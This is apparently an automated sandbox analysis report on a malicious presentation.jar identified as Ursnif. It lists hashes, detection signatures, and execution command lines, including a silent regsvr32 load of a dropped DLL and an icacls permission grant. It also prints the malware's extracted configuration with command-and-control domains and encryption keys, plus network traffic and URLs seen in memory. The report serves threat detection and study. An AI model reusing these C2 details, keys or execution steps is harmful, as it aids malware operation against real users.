Play interactive tour

Edit tour

Analysis Report presentation.jar

Overview

General Information

Sample Name:	presentation.jar
Analysis ID:	403821
MD5:	6c5e7908c3a06aafd6dcebc8a2dcb674
SHA1:	d094aef9d24e13ab70f2ef767242be554ed855ae
SHA256:	cb8b20c28a0ac697b6f5bd430bd86762f6b9ef635428fe3fe77e174b172ac6f4
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Exploit detected, runtime environment dropped PE file

Exploit detected, runtime environment starts unknown processes

Sigma detected: System File Execution Location Anomaly

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

cmd.exe (PID: 6680 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

java.exe (PID: 6732 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar' MD5: 28733BA8C383E865338638DF5196E6FE)

icacls.exe (PID: 6808 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

iexplore.exe (PID: 6900 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6976 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6900 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

regsvr32.exe (PID: 3084 cmdline: regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "C6HtybW6gOadm/yj7zZMo6G6KXFQ4dEp7zHfMW5IRELO0uvqi07MPT6/x9S6litknH+BvSY8WUJSCe++K06Znqzju0G9p4s7vFCRkOmz8D6jF964Fzsv95HaHsXi47+U2GiQ2Gikw0inkLSb2F3I2SWzZYUSFyC2M/2JSO9/RfzN4fQovVmdO23GnRaRT7RQ80xdzZmG/1KSXrPdpz6L0pheEWvnVtXAtJsxn0oJ2Av+YPARe6ceA0vZDing87oj0OaTGGHfCE60e2J7m50kPk40R/wZ5kCD/nJn2jktSyio6o+GuLZKR/fZyVreMHafB6O7UghEGnsrn77tN0EAJaA+F5jMamer1uRrqfAyszw=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "2500", "server": "580", "serpent_key": "ZihFTxUSedu9uCzM", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.regsvr32.exe.3ed0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
8.3.regsvr32.exe.2f8d23.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6680, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6696

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 8.3.regsvr32.exe.2f8d23.0.raw.unpack

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "C6HtybW6gOadm/yj7zZMo6G6KXFQ4dEp7zHfMW5IRELO0uvqi07MPT6/x9S6litknH+BvSY8WUJSCe++K06Znqzju0G9p4s7vFCRkOmz8D6jF964Fzsv95HaHsXi47+U2GiQ2Gikw0inkLSb2F3I2SWzZYUSFyC2M/2JSO9/RfzN4fQovVmdO23GnRaRT7RQ80xdzZmG/1KSXrPdpz6L0pheEWvnVtXAtJsxn0oJ2Av+YPARe6ceA0vZDing87oj0OaTGGHfCE60e2J7m50kPk40R/wZ5kCD/nJn2jktSyio6o+GuLZKR/fZyVreMHafB6O7UghEGnsrn77tN0EAJaA+F5jMamer1uRrqfAyszw=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "2500", "server": "580", "serpent_key": "ZihFTxUSedu9uCzM", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\broker.dll

ReversingLabs: Detection: 10%

Multi AV Scanner detection for submitted file

Show sources

Source: presentation.jar

Virustotal: Detection: 22%

Perma Link

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 13.224.193.90:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.224.193.90:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.25:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.25:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.126:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.98.126:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.249.219:443 -> 192.168.2.6:49734 version: TLS 1.2

Source:

Binary string: c:\119\Minute\Force_Lead\Apple\oil.pdb source: regsvr32.exe, 00000008.00000002.596564927.0000000003F04000.00000002.00020000.sdmp, broker.dll.2.dr

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes

Show sources

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Program Files\internet explorer\iexplore.exe

Source: Joe Sandbox View	IP Address: 34.202.206.65 34.202.206.65
Source: Joe Sandbox View	IP Address: 35.181.18.61 35.181.18.61

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: d2935c58fe676744fecc8614ee5356c7

Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa9f171a8,0x01d7411c</date><accdate>0xa9f171a8,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa9f171a8,0x01d7411c</date><accdate>0xa9f171a8,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa9f63655,0x01d7411c</date><accdate>0xa9f63655,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa9f898ac,0x01d7411c</date><accdate>0xa9f898ac,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa9f898ac,0x01d7411c</date><accdate>0xa9f898ac,0x01d7411c</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: www.java.com

Source: java.exe, 00000002.00000002.385608317.0000000016480000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: java.exe, 00000002.00000002.385608317.0000000016480000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: java.exe, 00000002.00000002.379299472.0000000009FC5000.00000004.00000001.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: 67B873F492AD87C25B322202223D7A22.cache[1].htm.6.dr	String found in binary or memory: http://bugs.webkit.org/show_bug.cgi?id=3810
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: notice[1].js.6.dr	String found in binary or memory: http://consent-pref.trustarc.com/?type=oracle6
Source: notice[1].js.6.dr	String found in binary or memory: http://consent.trustarc.com/
Source: notice[1].js.6.dr	String found in binary or memory: http://consent.trustarc.com/bannermsg?
Source: notice[1].js.6.dr	String found in binary or memory: http://consent.trustarc.com/noticemsg?
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org
Source: java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org
Source: java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org3
Source: java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org;~
Source: java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.orgs
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: java.exe, 00000002.00000002.380972798.0000000014F78000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: java.exe, 00000002.00000002.380972798.0000000014F78000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
Source: java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: renderer[1].js.6.dr	String found in binary or memory: http://github.com/requirejs/text/LICENSE
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: java.exe, 00000002.00000002.379321886.0000000009FD5000.00000004.00000001.sdmp	String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: java.exe, 00000002.00000003.351348069.000000001586A000.00000004.00000001.sdmp, java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://null.oracle.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com
Source: java.exe, 00000002.00000002.380972798.0000000014F78000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://ocsp.comodoca.com0
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com
Source: java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://ocsp.sectigo.com0
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: render[2].js.6.dr	String found in binary or memory: http://oss.oracle.com/licenses/upl.
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: 1.cache[1].js.6.dr	String found in binary or memory: http://ph-truste-stage.truste-svc.net/js/cookie_iframe.html
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/
Source: java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/K
Source: java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/c
Source: java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp, java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org
Source: java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
